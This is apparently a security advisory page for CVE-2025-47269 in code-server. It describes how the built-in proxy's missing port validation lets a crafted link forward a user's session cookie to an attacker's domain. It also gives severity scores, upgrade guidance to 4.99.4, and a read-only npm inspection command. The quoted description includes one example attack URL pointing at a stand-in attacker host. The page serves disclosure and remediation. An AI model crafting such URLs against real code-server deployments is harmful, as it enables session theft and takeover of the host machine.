Skip to content

← Actionable
High, CVSS 8.3amended

code-server's session cookie can be extracted by having user visit specially crafted proxy URL

CVE-2025-47269GHSA-p483-wpfp-42cj

What to do

Vendor fix available. Upgrade each affected package to the fixed version on its release line (code-server 4.99.4), redeploy, then verify what is actually installed.

This page has no inventory attached, so it cannot say whether you are affected. A vendor fix is not proof that your deployment is fixed.

Affected packages

Sources

Severity and exploitation
Exploitation
No confirmed exploitation recorded. Patch Next marks exploitation only from CISA KEV.
CVSS
8.3 · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L
EPSS
  • CVE-2025-47269: 56.28% estimated exploitation activity in the next 30 days; percentile 99.05 (FIRST EPSS, 2026-11-03). This is a model estimate, not proof of exploitation or customer exposure.
Source description

As published by the source; long descriptions are shortened.

Summary A maliciously crafted URL using the proxy subpath can result in the attacker gaining access to the session token. Details Failure to properly validate the port for a proxy request can result in proxying to an arbitrary domain. The malicious URL https://<code-server/proxy/test@evil.com/path would be proxied to test@evil.com/path where the attacker could exfiltrate a user's session token. Impact Any user who runs code-server with the built-in proxy enabled and clicks on maliciously crafted links that go to their code-server instances with reference to /proxy. Normally this is used to proxy local ports, however the URL can reference the attacker's domain instead, and the connection is then proxied to that domain, which will include sending cookies. With access to the session cookie, the attacker can then log into code-server and have full access to the machine hosting code-server as the user running code-server. Patches Patched versions are from v4.99.4 onward.

Dates and revisions
Published by the source
Last modified by the source
Source last checked
  1. Revision 2 · amended ·

    Amended from ghsa record GHSA-p483-wpfp-42cj

  2. Revision 1 · created ·

    Published from osv record GHSA-p483-wpfp-42cj

Agent brief

Preview the exact text before you copy it. Commands are read-only suggestions; review them before running anything.

# Patch Next advisory brief: CVE-2025-47269

Advisory: code-server's session cookie can be extracted by having user visit specially crafted proxy URL
IDs: CVE-2025-47269, GHSA-p483-wpfp-42cj
Record: https://patchnext.com/advisories/cve-2025-47269 (revision 2, source checked 26 Oct 2026, 12:37 UTC)
Inventory: none attached. This brief comes from a public page and does not say whether any deployment is affected.
Severity: High (CVSS 8.3)
Exploitation: no confirmed exploitation recorded. Patch Next confirms exploitation only from CISA KEV.
Vendor response: Vendor fix available; fixed versions by package: code-server 4.99.4. A vendor fix does not mean a deployment is fixed.

## Affected components
- npm code-server: affected < 4.99.4; fixed in 4.99.4

## Suggested inspection (read-only)
- `npm ls code-server --all`: lists every installed copy and version, including transitive ones. Run in the project root after `npm ci`.

## Supported action
Upgrade each affected component to a fixed version on its release line. For a transitive dependency, upgrade the parent package or add an override or constraint, then regenerate the lockfile. Redeploy every environment that ran an affected version.

## Required regression checks
- Run the test suite and a production build.
- Exercise the features that depend on code-server.
- Repeat the inspection and confirm that only fixed versions remain installed.

## Rollback considerations
- Keep the previous lockfile and deployment artifact. Rolling back reinstates the vulnerable version, so apply any documented mitigation while you fix forward.

## Unresolved questions
- Which deployments run an affected version?
- Exploitation status can change. Check again before lowering the priority.
- Mark the work resolved only after the fixed version is verified in production.

## Sources
- Verified: https://osv.dev/vulnerability/GHSA-p483-wpfp-42cj (OSV record GHSA-p483-wpfp-42cj lists affected ranges: npm code-server >=0 <4.99.4 (fixed))
- Verified: https://github.com/advisories/GHSA-p483-wpfp-42cj (GitHub-reviewed advisory GHSA-p483-wpfp-42cj lists affected ranges: npm code-server >=0 <4.99.4)

Commands are suggestions: review each one before running it.

Loading voting…